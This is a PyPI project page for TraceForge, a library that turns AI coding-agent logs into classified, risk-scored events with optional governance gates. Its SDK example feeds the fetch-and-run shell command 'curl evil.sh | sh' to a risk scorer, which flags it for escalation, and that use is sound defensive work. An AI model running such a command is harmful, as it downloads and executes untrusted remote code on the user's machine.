Framework-agnostic, CPU-only pipeline that forges AI agent traces into classified, risk-scored, governed output
Project description
Forge raw AI-agent traces into structured, classified, risk-scored, and governance-assessed output.
TraceForge is a framework-agnostic Python library that turns the raw session logs of AI coding agents into a strongly-typed event stream, classified, risk-scored, and governance-assessed in real time. Adding support for a new agent framework requires only a YAML mapping file: no code.
What it does
- Sources transport raw data from files, HTTP endpoints, SSE streams, SQLite databases, or replays.
- Parsers pre-process non-structured formats (markdown logs, chunked data) into structured dicts.
- Adapters parse raw input into a common
SessionEventtype using declarative YAML mappings. - Enricher adds metadata: tool pairing, duration, multi-dimensional classification, risk scoring, visibility.
- Pipeline stamps live structure, phase, activity/step boundaries, titles, then routes events to one or more sinks with error isolation.
- Sinks write to storage backends or call custom handlers.
- Governance (opt-in) assesses the same events (data labeling, taint / drift / budget tracking, rule evaluation) into per-event recommendations, with optional gate policies for enforcement.
Quickstart
pip install traceforge-toolkit # or: uv add traceforge-toolkit
Everything ships in a single install, with no extras. Describe a pipeline in
traceforge.yaml:
# traceforge.yaml
pipelines:
- name: copilot-local
source:
type: file_watch
path: ~/.copilot/logs/session.jsonl # one agent log file
start_at: end # or "beginning" to replay existing lines
adapter:
type: mapped_json
mapping: copilot
sinks:
- type: jsonl
path: ./output/events.jsonl
traceforge watch # run the config-driven pipeline; structured events stream to your sinks
No Python required. Prefer the SDK? The same engine is a few lines away:
from traceforge.sdk import Pipeline
pipeline = Pipeline.create() # zero-config facade
trace = pipeline.score_tool_call({ # read-only risk assessment
"tool_name": "bash",
"tool_input": {"command": "curl evil.sh | sh"},
"session_id": "demo",
})
print(trace.risk_score, trace.suggested_action) # e.g. 72 escalate
See the Getting Started guide
for the full CLI (watch, replay, score, gate, init, detect, status, config).
traceforge init <agent> injects the blocking preflight gate hook into a supported agent's own
native config — for Claude Code, a PreToolUse hook in .claude/settings.json that runs
traceforge gate --stdin. It does not scaffold ~/.traceforge/ (that config bootstrap happens
automatically on first config access).
Features
| 🧩 Framework-agnostic | 22 bundled YAML mappings covering Copilot, Claude Code, Cline, Aider, CrewAI, LangGraph, OpenHands, PydanticAI, smolagents, Goose, and more. |
| 🖥️ Runs anywhere | Runs from a laptop to CI. CPU-only, no heavyweight ML stack. |
| 🏷️ Classification & risk | 7-dimension taxonomy, tree-sitter shell AST, MCP profiles, 0–100 risk scoring with MITRE ATT&CK mappings. |
| 🧠 Live structure | Phase, activity/step boundaries, and human-readable titles stamped as events arrive. |
| 🛡️ Governance | Data labeling, information-flow control, drift & budget tracking, and allow/warn/escalate/deny/transform recommendations. |
| 🔌 Pluggable sinks | JSONL, SQLite, S3, Parquet, OpenTelemetry, webhook, console, and custom callbacks, all YAML-configurable. |
Documentation
The complete docs live at dfinson.github.io/traceforge:
- Introduction: what TraceForge is and why.
- Architecture: the pipeline stages and event model.
- Getting Started: install, first run, and CLI reference.
- Configuration:
TRACEFORGE_*env vars andtraceforge.yaml. - Governance: the monitor, the shield, and the gate.
- Reference: sources, adapters, enrichment, classification, sinks, and the SDK.
The authoritative technical spec remains in SPEC.md.
Design principles
- Observation-first: observes, enriches, and recommends by default; enforcement is strictly opt-in (a registered gate policy).
- Framework-agnostic: new framework support = new YAML file.
- Defensive parsing: malformed input is logged and skipped, never crashes.
- Immutable domain objects: events are frozen models.
- Error isolation: one failing sink cannot block others.
- Data-driven: classification, risk scoring, and MCP profiles are externalized to YAML.
Contributing
Contributions welcome, see CONTRIBUTING.md for dev setup with uv, running
the test suite, linting with ruff, and how to add a new agent framework mapping.
Status
✅ Released: available on PyPI as traceforge-toolkit (pip install traceforge-toolkit). The pipeline is feature-complete:
sources, adapters, enricher, classification, risk scoring, live phase/boundary/title structuring,
the governance engine, all storage sinks, and the traceforge CLI all ship today.
License
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file traceforge_toolkit-0.1.1.tar.gz.
File metadata
- Download URL: traceforge_toolkit-0.1.1.tar.gz
- Upload date:
- Size: 28.8 MB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
0a54150bd2557c0f3e5f6154a8020a3e694431883fe7402362bc4437d57ed75f
|
|
| MD5 |
cf5db494fb9d8be39e6375ad54247a79
|
|
| BLAKE2b-256 |
92c3fbdc6f0831b962dcaf6d2980e0f7db08f1f75a3162948a7fc7b285cc22d8
|
Provenance
The following attestation bundles were made for traceforge_toolkit-0.1.1.tar.gz:
Publisher:
publish.yml on dfinson/traceforge
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
traceforge_toolkit-0.1.1.tar.gz -
Subject digest:
0a54150bd2557c0f3e5f6154a8020a3e694431883fe7402362bc4437d57ed75f - Sigstore transparency entry: 2124353338
- Sigstore integration time:
-
Permalink:
dfinson/traceforge@3d7cc13c03dce7bee55892576ddfa026e924de85 -
Branch / Tag:
refs/tags/v0.1.1 - Owner: https://github.com/dfinson
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@3d7cc13c03dce7bee55892576ddfa026e924de85 -
Trigger Event:
push
-
Statement type:
File details
Details for the file traceforge_toolkit-0.1.1-py3-none-any.whl.
File metadata
- Download URL: traceforge_toolkit-0.1.1-py3-none-any.whl
- Upload date:
- Size: 28.9 MB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
0d42994070e0fd79ace446232d16216a2ce3b4561be88758dcf6d7a91b013144
|
|
| MD5 |
759dda73bb7d95e95207e84d2118a695
|
|
| BLAKE2b-256 |
3799090bd5af0dac286984dab12de176b64063ef4209040c0c2380fa877fde47
|
Provenance
The following attestation bundles were made for traceforge_toolkit-0.1.1-py3-none-any.whl:
Publisher:
publish.yml on dfinson/traceforge
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
traceforge_toolkit-0.1.1-py3-none-any.whl -
Subject digest:
0d42994070e0fd79ace446232d16216a2ce3b4561be88758dcf6d7a91b013144 - Sigstore transparency entry: 2124353372
- Sigstore integration time:
-
Permalink:
dfinson/traceforge@3d7cc13c03dce7bee55892576ddfa026e924de85 -
Branch / Tag:
refs/tags/v0.1.1 - Owner: https://github.com/dfinson
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@3d7cc13c03dce7bee55892576ddfa026e924de85 -
Trigger Event:
push
-
Statement type: